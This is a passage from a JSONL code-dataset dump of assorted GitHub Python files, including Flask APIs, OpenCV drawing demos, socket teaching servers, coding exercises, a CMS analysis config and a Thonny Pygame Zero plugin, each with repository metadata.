interval)\n","repo_name":"soukveda/CPSC-483-assignment-3","sub_path":"naive-bayes.py","file_name":"naive-bayes.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10867309429","text":"from flask import Blueprint\nfrom flask_restful import Resource, Api, output_json\n\nheaders = {'Content-Type': 'application/json'}\n\nbp = Blueprint('api', __name__, url_prefix='/api')\napi = Api(bp, catch_all_404s=True)\n\n\nclass Sample(Resource):\n def get(self):\n response = {'data': 'this is a sample response from the \"/api\" endpoint in flask Container'}\n return output_json(response, 200, headers)\n\n\napi.add_resource(Sample, '/')\n","repo_name":"JoseRoberts87/flask_container","sub_path":"flask_container/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41224596867","text":"from flask import Blueprint, request\nfrom db import DB\nfrom models.countries import Country\nfrom models.institutions import Institution\nfrom middlewares.serializer import serialize\nfrom jobs.cron import add_institution, add_country\nimport datetime\n\ndb_obj = DB() ### creating a object of DB function in db.py file\ndb_session = db_obj.get_db() ### getting a session of database\n\napi = Blueprint(\"api\", __name__, url_prefix=\"/api\")\n\n### GET RestAPI for institution details\n@api.route(\"/institutions\", methods = ['GET'])\ndef institutions():\n institution = db_session.query(Institution).all()\n return serialize(institution)\n\n### GET RestAPI for countries details\n@api.route(\"/countries\", methods = ['GET'])\ndef countries():\n country = db_session.query(Country).all()\n return serialize(country)\n\n### GET RestAPI for a countries detail, passed with country_id\n@api.route(\"/countries/\", methods = ['GET'])\ndef countries_filter(country_id):\n country = db_session.query(Country).filter(Country.country_id == country_id)\n return serialize(country)\n\n### GET RestAPI for a institution detail, passed with institution_id\n@api.route(\"/institutions/\", methods = ['GET'])\ndef institutions_filter(institution_id):\n institution = db_session.query(Institution).filter( Institution.institution_id == institution_id)\n return serialize(institution)\n\n### Post API for add new institution with or without adding country\n@api.route(\"/institutions\", methods = ['POST'])\ndef create_institution():\n input_data = request.json\n country_id = request.json['country_id']\n country_data = serialize(db_session.query(Country).filter(Country.country_id == country_id))\n if (len(country_data['data']) == 0): ### checking whether country already exists or not (does not exists in this case)\n country_input_data = {}\n country_input_data['country_id'] = country_id\n country_input_data['country_name'] = request.json['country_name']\n add_country(country_input_data) ### adding a new country\n del input_data['country_name']\n add_institution(input_data) ### adding a new institution\n return (\"Institution and Country added successfully\")\n if (len(country_data['data']) != 0): ### checking whether country already exists or not (exists in this case)\n if request.json['country_name'] == country_data['data'][0]['country_name']: ### checking country_id exists with same name\n del input_data['country_name']\n add_institution(input_data) ### adding a new institution\n return (\"Institution added successfully and Country Id already existed\")\n else:\n return (\"Country Id already exists with different name\")\n\n### PUT RestAPI to update country details\n@api.route(\"/countries/\", methods=['PUT'])\ndef update_country(country_id):\n country_id = request.json['country_id']\n country_data = serialize(db_session.query(Country).filter(Country.country_id == country_id))\n if (len(country_data['data']) != 0): ### checking whether country_id exists or not (exists in this case)\n db_session.query(Country).filter(Country.country_id == country_id).update({Country.country_name:request.json['country_name'],\n Country.inserted_date: datetime.datetime.now().date()}, synchronize_session = False)\n db_session.commit()\n return (\"Updated Country Succesfully\")\n \n if (len(country_data['data']) == 0): ### checking whether country_id exists or not (does not exists in this case)\n return (\"Country Id does not exist\")\n\n### PUT RestAPI to update institution details\n@api.route(\"/institutions/\", methods=['PUT'])\ndef update_institution(institution_id):\n institution_id = request.json['institution_id']\n institution_data = serialize(db_session.query(Institution).filter(Institution.institution_id == institution_id))\n if (len(institution_data['data']) != 0): ### checking whether institution_id exists or not (exists in this case)\n db_session.query(Institution).filter(Institution.institution_id == institution_id).update({Institution.institution_name: request.json['institution_name'],\n Institution.city_id: request.json['city_id'],\n Institution.city_name: request.json['city_name'],\n Institution.country_id: request.json['country_id'],\n Institution.course_count: request.json['course_count'],\n Institution.inserted_date: datetime.datetime.now().date()}, synchronize_session = False)\n db_session.commit()\n return (\"Updated Institution Succesfully\")\n\n if (len(institution_data['data']) == 0): ### checking whether institution_id exists or not (exists in this case)\n return (\"Institution Id does not exist\")\n\n### DELETE RestAPI to delete a country\n@api.route(\"/countries/\", methods = ['DELETE'])\ndef delete_country(country_id):\n country_data = serialize(db_session.query(Country).filter(Country.country_id == country_id))\n if (len(country_data['data']) != 0): ### checking whether country_id exists or not (exists in this case)\n db_session.query(Country).filter(Country.country_id == country_id).delete()\n db_session.commit()\n return (\"Deleted Country Succesfully\")\n \n if (len(country_data['data']) == 0): ### checking whether country_id exists or not (does not exists in this case)\n return (\"Country Id does not exist\")\n\n### DELETE RestAPI to delete a institution\n@api.route(\"/institutions/\", methods = ['DELETE'])\ndef delete_institution(institution_id): ### checking whether institution_id exists or not (exists in this case)\n institution_data = serialize(db_session.query(Institution).filter(Institution.institution_id == institution_id))\n if (len(institution_data['data']) != 0):\n db_session.query(Institution).filter( Institution.institution_id == institution_id).delete()\n db_session.commit()\n return (\"Deleted Institution Succesfully\")\n\n if (len(institution_data['data']) == 0): ### checking whether institution_id exists or not (exists in this case)\n return (\"Institution Id does not exist\")","repo_name":"shivanshgupta93/WebApplication","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74549180476","text":"import cv2\nimport numpy as np\n\nog_img = cv2.imread(filename=r'images\\bear.jpg')\nimg = og_img.copy()\n\n# cv2.imshow('bear', img)\n# cv2.waitKey(0)\n\nheight, width, _ = img.shape\nprint(f'height: {height}, width: {width}')\n\n#line\ncv2.line(img=img, pt1=(0, 0), pt2=(width, height), color=(0, 255, 0), thickness=5)\ncv2.imshow('bear', mat=img)\ncv2.waitKey(0)\n\n#rectangle\ncv2.rectangle(img=img, pt1=(200, 50), pt2=(400, 230), color=(255, 0, 0), thickness=3)\ncv2.imshow('bear', mat=img)\ncv2.waitKey(0)\n\n#circle\ncv2.circle(img=img, center=(300, 140), radius=90, color=(0, 0, 255), thickness=3)\ncv2.imshow('bear', mat=img)\ncv2.waitKey(0)\n\n#polygon not close\nimg = og_img.copy()\npts = np.array([[300, 140], [200, 200], [200, 50], [300, 50]], dtype='int32').reshape((-1, 1, 2))\ncv2.polylines(img=img, pts=[pts], isClosed=False, color=(0, 255, 0), thickness=3)\ncv2.imshow('logo', img)\ncv2.waitKey(0)\n\n#polygon close\nimg = og_img.copy()\npts = np.array([[300, 140], [200, 200], [200, 50], [300, 50]], dtype='int32').reshape((-1, 1, 2))\ncv2.polylines(img=img, pts=[pts], isClosed=True, color=(0, 255, 0), thickness=3)\ncv2.imshow('logo', img)\ncv2.waitKey(0)\n\n#text\nimg = og_img.copy()\ncv2.putText(\n img=img,\n text='Python rulez',\n org=(20, 40),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=1.5,\n color=(0, 0, 0),\n thickness=2)\ncv2.imshow('logo', img)\ncv2.waitKey(0)","repo_name":"gorzanskik-ai/computer-vision","sub_path":"01_basics/02_drawing.py","file_name":"02_drawing.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24792336435","text":"#!/usr/bin/python\n#\n# CODE BY: Camila Stefani Nachbar\n# Fatec Carapicuiba - Desenvolvimento de Jogos Digitais\n#\n# Servidor de Mensagens: jogo adivinhe o número\n# Módulo 2 - Redes\n#\n\nimport socket\nimport os\n\ns = socket.socket()\nhost = socket.gethostname()\nport = 12221\ns.bind((host, port))\ns.listen(5)\n\nfrom random import *\nrdn = randint(1, 20)\ntent = 3\n\nprint(\"[Aguardando por conexao...]\")\nc, addr = s.accept()\nos.system(\"cls\")\nprint(\"Conectado com:\", addr)\nwhile tent > 0: \n while True:\n msg = c.recv(1024)\n\n if int(msg) > rdn:\n bytes_text = bytes('Errou, numero é menor!', 'utf-8')\n c.send(bytes_text)\n elif int(msg) < rdn:\n bytes_text = bytes('Errou, numero é maior!', 'utf-8')\n c.send(bytes_text)\n elif int(msg) == rdn: \n bytes_text = bytes('Parabéns! Você acertou!', 'utf-8')\n c.send(bytes_text)\n else:\n bytes_text = bytes('Digite um valor valido', 'utf-8')\n c.send(bytes_text) \n if tent == 0:\n bytes_text = bytes('Que pena! Você perdeu! Mais sorte da próxima vez!', 'utf-8')\n c.send(bytes_text)\n tent = tent - 1\nif (msg == 'cls') or (msg == 'CLS'):\n os.system(\"cls\")\n print(\"Conectado com:\", addr)\n q = input(\"[Jogo terminado, reinicie........:] \")\nbytes_text = bytes(q, 'utf-8')\nc.send(bytes_text)\n","repo_name":"CamilaNachbar/jogo-python","sub_path":"servidor/jogo-adivinha.py","file_name":"jogo-adivinha.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"29536439261","text":"import os\n\nfrom Base.BaseRunner import ParametrizedTestCase\nfrom PageObject.JslifeApp.JslifeAppBasePage import JslifeAppPage\nPATH = lambda p: os.path.abspath(\n os.path.join(os.path.dirname(__file__), p)\n)\n\nclass JsLifeAppTest(ParametrizedTestCase):\n\n def executor(self,app={}):\n\n page = JslifeAppPage(app)\n page.operate()\n page.checkPoint()\n\n def test_executor(self):\n folder=os.walk(PATH(\"../../yamls\"))\n for root, dirs, files in folder:\n for file in files:\n #if file.startswith(\"test001\"):\n self.driver.launch_app()\n try:\n\n testCasePath=os.path.join(root, file)\n\n app = {\"logTest\": self.logTest, \"launch_app\":self.launch_app,\"driver\": self.driver,\n \"path\": testCasePath,\n \"device\": self.devicesName, \"caseName\":file.split(\".\")[0]}\n self.executor(app)\n except Exception as e:\n print(e)\n continue\n\n\nif __name__ == \"__main__\":\n js=JsLifeAppTest()\n js.test_executor()\n","repo_name":"samesky2016/appium-test","sub_path":"TestCase/JsLifeAppTestCase/JSLifeAppTest.py","file_name":"JSLifeAppTest.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"15962626734","text":"t=int(input())\n\ndef common_deno(x,y):\n for i in range(min(x,y),1,-1):\n if x%i==0 and y%i==0:\n return i\n return 1\n\nfor i in range(t):\n a,b=map(int,input().split())\n common=common_deno(a,b)\n print(common*(a//common)*(b//common))\n","repo_name":"choi2021/thisiscodingtest","sub_path":"수학/1934 최소공배수.py","file_name":"1934 최소공배수.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"8359976478","text":"#!/usr/bin/python\n\nimport socket\nimport getopt\nimport sys\nfrom multiprocessing import Lock, Process\n\nCOMMANDS = [\"ABRIR\", \"AGREGAR\", \"LEER\", \"CERRAR\"]\n\n\ndef set_port():\n opts, args = getopt.getopt(sys.argv[1:], 'p:')\n\n return int(opts[0][1])\n\n\ndef init_client(lock, client, address):\n file_name = file = None\n client.send(('Server commands are ' + str(COMMANDS) + '\\n').encode())\n\n while True:\n command = client.recv(256).decode()\n command = command.upper().strip()\n if command == 'ABRIR':\n if file is not None:\n client.send('The file is already open\\n'.encode())\n continue\n client.send('Enter the file name: '.encode())\n file_name = client.recv(256).decode()\n file = open(file_name, 'a')\n client.send('The file was opened\\n'.encode())\n elif command == 'AGREGAR':\n if file is None:\n client.send('A file must be opened first\\n'.encode())\n continue\n client.send('Write something to add to the file:\\n'.encode())\n user_string = client.recv(256).decode()\n lock.acquire()\n file.writelines(user_string)\n file.flush()\n lock.release()\n client.send('The file has been written\\n'.encode())\n elif command == 'LEER':\n if file is None:\n client.send('A file must be opened first\\n'.encode())\n continue\n with open(file_name, 'r') as read_fd:\n content = str(read_fd.read()) + '\\n'\n client.send(content.encode())\n elif command == 'CERRAR':\n client.send('Closing the file\\n'.encode())\n if file is not None:\n file.close()\n break\n else:\n client.send(('Enter a valid command: ' + str(COMMANDS) + '\\n').encode())\n print('Client ' + address + ' disconnected')\n client.close()\n sys.exit(0)\n\n\ndef init_server():\n port = set_port()\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind(('', port))\n address = socket.gethostbyname(socket.getfqdn())\n print('Server started at ' + address + ' on port ' + str(port))\n\n lock = Lock()\n while True:\n server.listen(10)\n client, connection = server.accept()\n print('Client ' + connection[0] + ' connected')\n process = Process(target=init_client, args=(lock, client, connection[0]))\n process.start()\n\n\ninit_server()\n","repo_name":"juanicastellan0/python-parallel-programming","sub_path":"practices/client_lock.py","file_name":"client_lock.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32795834353","text":"__version__=\"1.0\"\n\nimport numpy as np\nimport sys\n\ndef geni(v, s, max_i):\n quality_1 = 0\n quality_2 = 0\n\n s_star = Solution()\n s_start.quality = sys.maxint\n\n for i in range(1, max_i):\n quality_1 = quality_after_insertion_1(v, i, )\n quality_2 = quality_after_insertion_2()\n\n if quality_1 < quality_2 and quality_1 < s_star.quality:\n s_star = insertion_1(s)\n elif quality_2 < quality_1 and quality_2 < s_star.quality:\n s_star = insertion_2(s)\n\n return s_star\n","repo_name":"wouterkool/attention-learn-to-route","sub_path":"problems/pctsp/salesman/pctsp/algo/geni.py","file_name":"geni.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":906,"dataset":"github-code","pt":"96"} +{"seq_id":"4648279561","text":"import oracledb\nimport config\nimport petl as etl\nimport pandas as pd\nimport numpy as np\noracledb.init_oracle_client(lib_dir=r\"E:\\Downloads\\instantclient_21_6\")\nmin_salary=int(input(\"Enter Minimum Salary =>\"))\nmax_salary=int(input(\"Enter Maximum Salary =>\"))\nsql = 'select empno,salary from empdept where salary> :min_salary and salary< :max_salary'\n\n\ntry:\n # connect to the Oracle Database\n with oracledb.connect(\n user=config.username,\n password=config.password,\n dsn=config.dsn,\n encoding=config.encoding) as connection:\n with connection.cursor() as cursor:\n cursor.execute(sql,{'min_salary':min_salary,'max_salary':max_salary})\n rows=cursor.fetchall()\n table1 = etl.fromdb(connection.cursor, sql,{'min_salary':min_salary,'max_salary':max_salary})\n nr = etl.nrows(table1)\n table2 = etl.look(table1, limit=30)\n print(table2)\nexcept oracledb.Error as error:\n print(error)","repo_name":"MasterChief70/Python-Basics","sub_path":"Sql1/tables/query1/q21_salary_between.py","file_name":"q21_salary_between.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"29927898922","text":"import FWCore.ParameterSet.Config as cms\nimport FWCore.Utilities.FileUtils as FileUtils\n\nprocess = cms.Process(\"flashggCommissioning\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\n# geometry and global tag:\n\nprocess.load(\"Configuration.StandardSequences.GeometryDB_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.GlobalTag.globaltag = 'POSTLS170_V5::All'\n\n#**************************************************************\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(500) )\n\ninputlist = FileUtils.loadListFromFile('fileList_ggToH_125_13TeV.txt')\nreadFiles = cms.untracked.vstring( *inputlist)\nprocess.source = cms.Source(\"PoolSource\", fileNames = readFiles)\n\n#**************************************************************\n\nprocess.load(\"flashgg/MicroAOD/flashggPhotons_cfi\")\nprocess.load(\"flashgg/MicroAOD/flashggDiPhotons_cfi\")\nprocess.load(\"flashgg/MicroAOD/flashggTkVtxMap_cfi\")\n\nprocess.commissioning = cms.EDAnalyzer('flashggCommissioning',\n PhotonTag=cms.untracked.InputTag('flashggPhotons'),\n DiPhotonTag = cms.InputTag('flashggDiPhotons'),\n VertexTag=cms.untracked.InputTag('offlineSlimmedPrimaryVertices')\n)\n\n#**************************************************************\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string(\"tree.root\")\n)\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\", fileName = cms.untracked.string('test_microAOD_ggToH_125_13TeV.root'),\n outputCommands = cms.untracked.vstring(\"drop *\",\"keep *_flashgg*_*_*\",\"keep *_offlineSlimmedPrimaryVertices_*_*\")\n)\n\n\nprocess.p = cms.Path(process.flashggVertexMapUnique*process.flashggVertexMapNonUnique*process.flashggPhotons*process.flashggDiPhotons*process.commissioning)\nprocess.e = cms.EndPath(process.out)\n","repo_name":"cms-analysis/flashgg","sub_path":"Validation/python/flashggCommissioningAnalyzer_cfg.py","file_name":"flashggCommissioningAnalyzer_cfg.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"96"} +{"seq_id":"18393507000","text":"# done!\r\nimport json\r\n\r\n\r\ndef print_student_sentence(name, age, today):\r\n print(\"{} is aged {}. He is a passionate learner, and he started a JD program just {}.\".format(name, age, today))\r\n\r\n\r\nprint(\"task1: \", end=\"\")\r\nprint_student_sentence(\"Aleks\", 22, \"today\")\r\n\r\ntransactions_even = [4, 6, 8, 10]\r\n\r\n\r\n# done!\r\ndef store_transactions(transaction_id, transactions):\r\n if transaction_id % 2 == 0:\r\n transactions.append(transaction_id)\r\n return transactions\r\n\r\n\r\nprint(\"task2: \", end=\"\")\r\nprint(store_transactions(2, transactions_even))\r\n\r\nmovie_dictionary = {\r\n \"title\": \"Star Wars\",\r\n \"year\": 1977,\r\n \"actors\": {\r\n \"Darth Vader\": \"Actor1\",\r\n \"Yoda\": \"Actor2\",\r\n \"wages\": {\r\n \"wage1\": 200.25\r\n }\r\n }\r\n}\r\n\r\n\r\n# done!\r\ndef pretty_print_dict(dictionary):\r\n pretty = json.dumps(dictionary, indent=4)\r\n print(pretty)\r\n\r\n\r\nprint(\"task3: \", end=\"\")\r\npretty_print_dict(movie_dictionary)\r\n\r\nsums_array = [5, 11, 6]\r\n\r\n\r\n# done!\r\ndef store_sum(number1, number2, sums):\r\n number = number1 + number2\r\n sums.append(number)\r\n return sums\r\n\r\n\r\nprint(\"task4: \", end=\"\")\r\nprint(store_sum(5, 7, sums_array))\r\n\r\n\r\n# done!\r\ndef get_chars_count(string):\r\n counter = 0\r\n\r\n for i in string:\r\n counter = counter + 1\r\n return counter\r\n\r\n\r\nprint(\"task5: \", end=\"\")\r\nstring_counter = get_chars_count(\"Hello, World!\")\r\nprint(string_counter)\r\n\r\n\r\n# done\r\ndef get_abbreviation(string):\r\n if len(string) > 5:\r\n to_return = \"\"\r\n for i in range(3):\r\n to_return = to_return + string[i]\r\n return to_return\r\n else:\r\n return None\r\n\r\n\r\nprint(\"task6: \", end=\"\")\r\nprint(get_abbreviation(\"faculty\"))\r\n\r\n\r\n# print(get_abbreviation(\"four\"))\r\n\r\n\r\n# done!\r\ndef get_titled_string(sentence):\r\n return sentence.title()\r\n\r\n\r\nprint(\"task7: \", end=\"\")\r\nprint(get_titled_string(\"hello, world!\"))\r\n\r\n\r\n# done!\r\ndef get_number_sum(array, target_sum):\r\n result = []\r\n for i in range(len(array)):\r\n for j in range(i+1, len(array)):\r\n if (array[i] + array[j]) == target_sum:\r\n result = [array[i], array[j]]\r\n return result\r\n return result\r\n\r\n\r\narr = [3, 5, -4, 8, 11, 1, -1, 6]\r\ntarget_sum = 10\r\nprint(\"task8: \", end=\"\")\r\nprint(get_number_sum(arr, target_sum))\r\n\r\n\r\n# done!\r\ndef get_is_valid_subsequence(array, sequence):\r\n seq_index = 0\r\n for i in range(len(array)):\r\n if array[i] == sequence[seq_index]:\r\n seq_index += 1\r\n if seq_index == len(sequence):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\narr = [5, 1, 22, 25, 6, -1, 8, 10]\r\nseq = [1, 6, -1, 10]\r\nprint(\"task9: \", end=\"\")\r\nprint(get_is_valid_subsequence(arr, seq))\r\n\r\n\r\n# done!\r\ndef get_is_palindrome(string):\r\n j = len(string) - 1\r\n counter = 0\r\n\r\n for i in range(0, int(len(string) / 2), 1):\r\n if string[i] == string[j]:\r\n counter = counter + 1\r\n j = j - 1\r\n if counter == int(len(string) / 2):\r\n return True\r\n return False\r\n\r\n\r\nprint(\"task10: \", end=\"\")\r\nprint(get_is_palindrome(\"азобичаммачибоза\"))\r\n\r\n","repo_name":"alexbozhinov/CodeAcademy","sub_path":"Python_homeworks/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"6877366884","text":"from collections import Counter\nfrom decimal import Decimal\nfrom typing import List\n\nfrom item import ItemRecord, ProductsStore\n\n\nclass Basket(Counter):\n \"\"\"\n Covers core basket functionality.\n\n Basket must do three things, but do well ;)\n 1) update (add/delete) items from it\n 2) get items list (basket content)\n 3) empty itself\n\n Counter is a great \"framework\" for this as it covers all that actions by default :)\n \"\"\"\n def __init__(self, session, *args, **kwargs):\n try:\n self.update(**session['basket'])\n except KeyError:\n super().__init__(*args, **kwargs)\n session['basket'] = self\n\n def _clean(self):\n \"\"\"\n Clean rubbish basket items (with zero or negative amount values) that may\n be produced as a result of Counter's update() / subtract() methods\n :return:\n \"\"\"\n\n crap_items =[]\n for item in self:\n if self[item] <= 0:\n crap_items.append(item)\n for item in crap_items:\n del self[item]\n\n def get_items(self):\n for item_id in self:\n yield item_id, self[item_id]\n\n def update_items(self, items: List[ItemRecord]):\n for item in items:\n self.update({item.id: item.quantity})\n self._clean()\n\n def empty(self):\n self.clear()\n\n def items_sum_price(self):\n \"\"\"Generator that provides all items prices\"\"\"\n ps = ProductsStore()\n total_price = 0\n for item_id in self:\n item_price = ps.get(item_id, 'price')\n if item_price:\n total_price += Decimal(item_price) * self[item_id]\n return Decimal(total_price)\n\n","repo_name":"krembas/basket-recruitment-task","sub_path":"basket.py","file_name":"basket.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23947506968","text":"# import heapq\n# import sys\n# input = sys.stdin.readline\n# n = int(input())\n# list1= []\n# answer = []\n# for i in range(n):\n# list1.append(list(map(int,input().split())))\n# list1.sort(key=lambda x: x[0])\n# target = int(input())\n# start = list1[0][0] \n# end = start + target\n# for i in range(n):\n# if( )\nimport sys\nimport heapq\n\nn = int(sys.stdin.readline())\nroad_info = []\nfor _ in range(n):\n road = list(map(int, sys.stdin.readline().split()))\n road_info.append(road)\nprint(road_info)\nd = int(sys.stdin.readline())\nroads = []\nfor road in road_info:\n house, office = road \n if abs(house - office) <= d:\n road = sorted(road)\n roads.append(road)\nroads.sort(key=lambda x:x[1])\n\nanswer = 0\nheap = []\nfor road in roads:\n if not heap:\n heapq.heappush(heap, road)\n else:\n while heap[0][0] < road[1] - d:\n heapq.heappop(heap)\n if not heap:\n break\n heapq.heappush(heap, road)\n answer = max(answer, len(heap))\n\nprint(answer)","repo_name":"jjung7/jjung7Baekjun","sub_path":"13334.py","file_name":"13334.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15558354703","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nN = 10000\n\n\nU = np.random.rand(N) #random variables\nT = -np.log(U) / 2 # Transform to exponentially distributed RVs\n\n#hist bins, counts\nnbins = 15\nhist, xout = np.histogram(T, bins=nbins)\npdf = hist / N / (xout[1] - xout[0]) # Normalize the histogram\n\n#PDF\ndef theoretical_pdf(t):\n y = np.zeros_like(t) #new empty array like T\n for i in range(len(t)):\n if t[i] < 0:\n y[i] = 0\n else:\n y[i] = 2 * np.exp(-2 * t[i])\n return y\n\nt = np.linspace(min(T), max(T), 100) #PDF line\ny = theoretical_pdf(t)\n\n# Plot\nplt.figure(figsize=(10, 6))\nplt.stairs(xout[:-1], pdf, fill=True, label='Simulated PDF')\nplt.plot(t, y, color='red', label='Theoretical PDF')\nplt.xlabel('T (seconds)')\nplt.ylabel('Probability Density')\nplt.title('Exponentially Distributed RV Histogram')\nplt.legend()\nplt.grid(True)\nplt.show()\n","repo_name":"RodrigoBoixo/ee381project2","sub_path":"p3c.py","file_name":"p3c.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"31913490042","text":"# // Game Winner\n# // Two players are playing a game where white or black pieces are represented by a string, colors. The game rules are:\n# // Wendy moves first, players alternate turns\n# // Each move, the player my remove their piece if both adjacent pieces are the same color\n# // Wendy’s pieces are white and Bob’s pieces are black\n# // When a piece is removed, the string is reduced in length by one piece\n# // When a player can no longer move, they have lost the game\n# // Example\n# // colors = “wwwbbbbwww”\n# // Wendy removes idx = 1, colors = “wwbbbbwww”\n# // Bob removes idx = 3, colors = “wwbbbwww”\n# // Wendy removes idx = 6, colors = “wwbbbww”\n# // Bob removes idx = 3, colors = “wwbbww”\n# // Wendy has no move, Bob wins the game.\n# // Determine who wins the game if both play with optimum skill. If Wendy wins, return ‘wendy’ and if Bob wins, return ‘bob’\ndef gameWinner(colors):\n turn = \"wendy\"\n for curr in colors:\n print(curr)\n if(turn is \"wendy\"):\n turn = \"bob\"\n elif(turn is \"bob\"):\n turn = \"wendy\"\n# function gameWinner(colors) {\n\n\n# }\nprint(gameWinner(\"wwwbbbbwww\")) # expected = “bob”\n'''\nwwwbbbbwww\nw_wb_bbww\n\n'''\n","repo_name":"pcricket10/random-code","sub_path":"python_review/game_winner.py","file_name":"game_winner.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"16598728295","text":"# a = input().lower()\r\n# c = list(a)\r\n# print(\"Created list is: \", c)\r\n\r\n#1.2\r\n\r\nstr = input()\r\nchar_list = list(str.lower())\r\ndef freq(char_list):\r\n i = {}\r\n for STR in char_list:\r\n if STR in i:\r\n i[STR] += 1\r\n else:\r\n i[STR] = 1\r\n frequency_list = [(char, frequency) for char, frequency in i.items()]\r\n return frequency_list\r\nresult = freq(char_list)\r\nprint(\"Result: \", result)\r\n\r\n#1.3\r\nstr = input()\r\ninput_list = list(str.lower())\r\nvowels = 'aeiou'\r\nvow = [i for i in input_list if i in vowels]\r\ncons = [i for i in input_list if i.isalpha() and i not in vowels]\r\nsymb = [i for i in input_list if not i.isalpha()]\r\nprint(\"vow =\", vow)\r\nprint(\"cons =\", cons)\r\nprint(\"symb =\", symb)\r\n\r\n# 1.4\r\n# try:\r\n# list_A = input(\"Write a list of numbers separated by commas: \")# if not list_A:\r\n# print(\"Input is empty!!!\")#\r\n# number_list = [int(x) for x in list_A.split(',')]# number_list.sort()\r\n## num = len(number_list)\r\n# q1 = number_list[:num // 4]# q2 = number_list[num // 4:num // 2]\r\n# q3 = number_list[num // 2:3 * num // 4]# q4 = number_list[3 * num // 4:]\r\n## print(\"q1 =\", q1)\r\n# print(\"q2 =\", q2)# print(\"q3 =\", q3)\r\n# print(\"q4 =\", q4)#\r\n# except (ValueError, IndexError):# print(\"Wrong value or sequence out of range!!! \")","repo_name":"turnUrmagicon/lab6","sub_path":"task 1.py","file_name":"task 1.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23758235970","text":"import ast\nimport os\nimport sys\nfrom logging import getLogger\n\nfrom thonny.plugins.cpython_backend import MainCPythonBackend, get_backend\n\nlogger = getLogger(__name__)\n\n\ndef augment_ast(root):\n mode = os.environ.get(\"PGZERO_MODE\", \"False\")\n assert mode != \"False\"\n\n warning_prelude = \"WARNING: Pygame Zero mode is turned on (Run → Pygame Zero mode)\"\n try:\n import pgzero # @UnusedImport\n except ImportError:\n if mode == \"True\":\n print(\n warning_prelude\n + \",\\nbut pgzero module is not found. Running program in regular mode.\\n\",\n file=sys.stderr,\n )\n else:\n assert mode == \"auto\"\n\n return\n\n # Check if draw is defined\n for stmt in root.body:\n if isinstance(stmt, ast.FunctionDef) and stmt.name == \"draw\":\n break\n else:\n if mode == \"auto\":\n return\n else:\n print(\n warning_prelude\n + \",\\nbut your program doesn't look like usual Pygame Zero program\\n\"\n + \"(draw function is missing).\\n\",\n file=sys.stderr,\n )\n\n # need more checks in auto mode\n if mode == \"auto\":\n # check that draw method is not called in the code\n for node in ast.walk(root):\n if (\n isinstance(node, ast.Call)\n and isinstance(node.func, ast.Name)\n and node.func.id == \"draw\"\n ):\n return\n\n # prepend \"import pgzrun as __pgzrun\"\n imp = ast.Import([ast.alias(\"pgzrun\", \"__pgzrun\")])\n imp.lineno = 0\n imp.col_offset = 0\n ast.fix_missing_locations(imp)\n imp.tags = {\"ignore\"}\n root.body.insert(0, imp)\n\n # append \"__pgzrun.go()\"\n go = ast.Expr(\n ast.Call(ast.Attribute(ast.Name(\"__pgzrun\", ast.Load()), \"go\", ast.Load()), [], [])\n )\n go.lineno = 1000000\n go.col_offset = 0\n ast.fix_missing_locations(go)\n go.tags = {\"ignore\"}\n root.body.append(go)\n\n\ndef patched_editor_autocomplete(self, cmd):\n logger.debug(\"Starting patched _cmd_editor_autocomplete\")\n # Make extra builtins visible for Jedi\n prefix = \"from pgzero.builtins import *\\n\"\n cmd[\"source\"] = prefix + cmd[\"source\"]\n cmd[\"row\"] = cmd[\"row\"] + 1\n\n result = get_backend()._original_editor_autocomplete(cmd)\n result[\"row\"] = result[\"row\"] - 1\n result[\"source\"] = result[\"source\"][len(prefix) 